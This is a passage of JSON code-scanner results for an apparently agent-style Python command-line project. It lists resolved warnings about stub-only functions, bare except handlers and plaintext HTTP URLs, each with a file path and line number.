{"snippet": "def call_tool(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/mcp.py"}, "region": {"startLine": 29}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21223, "scanner": "repobility", "fingerprint": "738e93764dfc86bce8f82f3731ccb570", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def on_state_changed(...): pass", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tui/screens/repl.py"}, "region": {"startLine": 203}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21222, "scanner": "repobility", "fingerprint": "571dcac5904d4d24ba618a8facc83831", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def requires_user_interaction(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/permissions/check.py"}, "region": {"startLine": 51}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21221, "scanner": "repobility", "fingerprint": "709b55609b978bd6267086bbd6a6bd9f", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def check_permissions(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/permissions/check.py"}, "region": {"startLine": 44}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21220, "scanner": "repobility", "fingerprint": "6dd4eb1e1e916ad6ff23354dc7caa552", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def is_mcp(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/permissions/check.py"}, "region": {"startLine": 42}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21219, "scanner": "repobility", "fingerprint": "cdb77dc491e9ddb4cdf59eed011328e0", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def name(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/permissions/check.py"}, "region": {"startLine": 39}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21218, "scanner": "repobility", "fingerprint": "66e2d5313931396be437b37bb4f20b09", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def is_mcp(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/permissions/rules.py"}, "region": {"startLine": 23}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21217, "scanner": "repobility", "fingerprint": "dcd8584816a6b50553cd7b63f88a8629", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def name(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/permissions/rules.py"}, "region": {"startLine": 20}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21216, "scanner": "repobility", "fingerprint": "ead410a4f4391f569699728c4fb0bd20", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def cleanup(...): pass", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/types.py"}, "region": {"startLine": 98}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21215, "scanner": "repobility", "fingerprint": "f7f218df337dd29f30f415fc190ff009", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def receive(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/transport.py"}, "region": {"startLine": 246}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21214, "scanner": "repobility", "fingerprint": "c71ff4ce14a5dd281071ac932f7716c1", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def send(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/transport.py"}, "region": {"startLine": 243}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21213, "scanner": "repobility", "fingerprint": "12755ff6d8e29427c37b5046dee339ab", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def receive(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/transport.py"}, "region": {"startLine": 223}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21212, "scanner": "repobility", "fingerprint": "1929ec0540c9b9bf3749bd2d0e3640d9", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def send(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/transport.py"}, "region": {"startLine": 220}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21211, "scanner": "repobility", "fingerprint": "897363a667a9ef567b6111876adda53b", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def is_connected(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/transport.py"}, "region": {"startLine": 70}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21210, "scanner": "repobility", "fingerprint": "e31e63de7437ab2b6b6ef2e8e18ea4b2", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def close(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/transport.py"}, "region": {"startLine": 65}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21209, "scanner": "repobility", "fingerprint": "c267964271bb4e6e8a5360f05e321e89", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def receive(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/transport.py"}, "region": {"startLine": 61}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21208, "scanner": "repobility", "fingerprint": "c4c82f7ac292477e7072669627b77db1", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def send(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/transport.py"}, "region": {"startLine": 57}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21207, "scanner": "repobility", "fingerprint": "7abcf51846cee10418b41e777f5f961f", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def start(...): ...", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/transport.py"}, "region": {"startLine": 53}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21206, "scanner": "repobility", "fingerprint": "335a6b4f7c44c03bca919cacbbef5312", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def emit(...): pass", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/analytics/sink.py"}, "region": {"startLine": 37}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21205, "scanner": "repobility", "fingerprint": "5dd003ae3f6a655d0f8be2de83229512", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def log_message(...): pass", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/auth/oauth.py"}, "region": {"startLine": 103}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21204, "scanner": "repobility", "fingerprint": "dcaf833fdb72acfc48ead33145fe5896", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def __init__(...): pass", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 81}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21203, "scanner": "repobility", "fingerprint": "a2447c74d3ae15fbefcff9a51d508449", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def __init__(...): pass", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 77}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21202, "scanner": "repobility", "fingerprint": "ad35de977b16ed6790b74b6f36e22d51", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def __init__(...): pass", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 71}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21201, "scanner": "repobility", "fingerprint": "db97220e66f2542ade5e4a08290c86b2", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def __init__(...): pass", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 63}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21200, "scanner": "repobility", "fingerprint": "40a01b3cb6ef20680a23d2e28cfd83b0", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def __init__(...): pass", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 54}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21199, "scanner": "repobility", "fingerprint": "f2cff733097f58fcb3efb10cdc1d7667", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def __init__(...): pass", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/core.py"}, "region": {"startLine": 50}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21198, "scanner": "repobility", "fingerprint": "d3b7005627bb26ceee60292e6b4c026b", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def __init__(...): pass", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/repl/at_file_completer.py"}, "region": {"startLine": 45}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21197, "scanner": "repobility", "fingerprint": "59a48ffb2c4da262e267c8def9ccf1a0", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def flush(...): pass", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/tui/test_terminal_chrome.py"}, "region": {"startLine": 25}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21196, "scanner": "repobility", "fingerprint": "b5d2970dc6881fdc1d92bd3c3948d193", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def chat_stream_response(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_smoke.py"}, "region": {"startLine": 120}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21195, "scanner": "repobility", "fingerprint": "d25aa56aa4202a0db6af173860970294", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def chat_stream_response(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_smoke.py"}, "region": {"startLine": 75}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21194, "scanner": "repobility", "fingerprint": "b1ad3eac714a932b8c5ea2093c430047", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def __init__(...): pass", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_tool_queries.py"}, "region": {"startLine": 518}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21193, "scanner": "repobility", "fingerprint": "a77b3be1cd43c36a3b5ca36a8abd2752", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def chat_stream_response(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_tool_queries.py"}, "region": {"startLine": 449}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21192, "scanner": "repobility", "fingerprint": "61c40b6a3fe94d65c2315e75d012fd63", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def chat_stream_response(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_tool_queries.py"}, "region": {"startLine": 322}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21191, "scanner": "repobility", "fingerprint": "2773befce7a1e41ed42e216c36b6d8eb", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def chat_stream_response(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_tool_queries.py"}, "region": {"startLine": 288}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21190, "scanner": "repobility", "fingerprint": "58d67d2e215cf96f9b2b4fb0d7ce28d4", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def chat_stream_response(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_tool_queries.py"}, "region": {"startLine": 247}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21189, "scanner": "repobility", "fingerprint": "ec743c7ca174bbfaa97c518aa5a1607e", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def chat_stream_response(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_tool_queries.py"}, "region": {"startLine": 201}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21188, "scanner": "repobility", "fingerprint": "a1bea32aaa4b0bd754260bced3415d99", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def chat_stream_response(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_tool_queries.py"}, "region": {"startLine": 168}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21187, "scanner": "repobility", "fingerprint": "73b6dfef1e9a4ffa4f14a3c721aa220e", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def chat_stream_response(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_tool_queries.py"}, "region": {"startLine": 106}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21186, "scanner": "repobility", "fingerprint": "5ddb57fc8e6195d7d8e79015919d6063", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def chat_stream_response(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_tool_queries.py"}, "region": {"startLine": 72}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21185, "scanner": "repobility", "fingerprint": "8dc6ae0897cf0b89e7398dc10fc2b5fd", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def chat_stream_response(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_integration_tool_queries.py"}, "region": {"startLine": 39}}}]}, {"ruleId": "TEST002", "level": "warning", "message": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "properties": {"repobilityId": 21184, "scanner": "repobility", "fingerprint": "449215e8f0f9efb17cbd0b0c7e445fc5", "category": "test_quality", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "def chat_stream(...): raise NotImplementedError", "aljefra_cwe": ["CWE-1188"], "aljefra_owasp": null, "aljefra_pattern_slug": "stub-only-function"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_headless_cli.py"}, "region": {"startLine": 40}}}]}, {"ruleId": "ERRH002", "level": "warning", "message": {"text": "Bare except \u2014 overly broad"}, "properties": {"repobilityId": 18433, "scanner": "repobility", "fingerprint": "9a8195e4986dda15096dda997b1fd3ab", "category": "error_handling", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "bare except handler (caught Exception)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-without-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/utils/git.py"}, "region": {"startLine": 129}}}]}, {"ruleId": "ERRH002", "level": "warning", "message": {"text": "Bare except \u2014 overly broad"}, "properties": {"repobilityId": 18432, "scanner": "repobility", "fingerprint": "34fa839c00def9979f105cc15b9b3db1", "category": "error_handling", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "bare except handler (caught Exception)", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "bare-except-without-pass"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "/tank0/claude-archive/opus47/agentforce314__clawcodex/src/utils/git.py"}, "region": {"startLine": 33}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 13495, "scanner": "repobility", "fingerprint": "fb83c5cec6775ec53442a864c7517e90", "category": "crypto", "severity": "medium", "confidence": 0.85, "triageState": "fixed", "verdict": "", "isResolved": true, "reason": "", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/doctor.py"}, "region": {"startLine": 148}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 13494, "scanner": "repobility", "fingerprint": "80bd7f91a8554c6d4c52e1b5e7eda42f", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "fixed", "verdict": "likely_fp", "isResolved": true, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_permission_classifier.py"}, "region": {"startLine": 112}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 13493, "scanner": "repobility", "fingerprint": "91b9443bfd98d1505dcc39146017f487", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "fixed", "verdict": "likely_fp", "isResolved": true, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_phase_a_integration.py"}, "region": {"startLine": 43}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 13492, "scanner": "repobility", "fingerprint": "8413cb8b751dfdb7a27f61bcb273e0b4", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "fixed", "verdict": "likely_fp", "isResolved": true, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_phase_a_integration.py"}, "region": {"startLine": 41}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 13491, "scanner": "repobility", "fingerprint": "bbb1d3af208554fa860f5763a5b01305", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "fixed", "verdict": "likely_fp", "isResolved": true, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_ssrf_guard.py"}, "region": {"startLine": 110}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 13490, "scanner": "repobility", "fingerprint": "f5c269af49b300453a031ab11887223a", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "fixed", "verdict": "likely_fp", "isResolved": true, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": 